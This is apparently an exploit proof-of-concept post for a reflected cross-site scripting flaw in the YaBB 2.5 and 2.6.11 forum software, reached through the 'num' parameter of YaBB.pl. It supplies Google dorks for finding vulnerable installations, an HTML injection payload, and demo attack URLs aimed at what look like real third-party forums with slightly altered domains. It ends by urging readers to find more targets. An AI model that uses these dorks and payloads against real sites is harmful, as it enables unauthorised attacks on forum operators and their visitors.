###
# Title : Exploit YaBB 2.6.11 & YaBB 2.5 XsS vulnerability
# Author : Dz MinD Injector
# Home : Algeria 23000 d^_^b
# FaCeb0ok : https://www.facebook.com/pokeme23
# Type : proof of concept
# Tested on : Windows7 & Linux
# Vendor : http://www.yabbforum.com/?page_id=32
###
# <?php
# echo " Freedom t0 Palastine " ;
# ?>
# Lov3 Explo8ting Just For Fun !
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:YaBB.pl?num=
#+ "Powered by YaBB 2.5"
#+ "Powered by YaBB 2.6.11"
#########################PrOof Of ConCept ##################################
#+ http://[target]/[path]/YaBB.pl?num=
#! Vulnerablity in YaBB.pl?num=
#+ Try :
## http://[target]/[path]/YaBB.pl?num=><h1> XssEd </h1>
##Demo's :
http://ugene.Xnet/forum/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E
http://www.yabbforumX.com/community/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E
https://antipolygraphX.org/cgi-bin/forums/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E
http://dynonavionicXs.com/cgi-bin/yabb2/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E
http://www.clusteXrheadaches.com/cgi-bin/yabb2/YaBB.pl?num=%3E%3Cmarquee%3EDz%20MinD%20injector%3C/marquee%3E
http://www.autoXgraph-maths.com/cgi-bin/yabb2/YaBB.pl?num=%3E%3Cmarquee%3E%3Ch1%3Emy%20test%3C/marquee%3C/h1%3E
http://www.falcXonfly.de/cgi-bin/yabb2/YaBB.pl?num=%3E%3Cmarquee%3E%3Ch1%3Emy%20test%3C/marquee%3C/h1%3E
!+ Find More targets in Google ^_^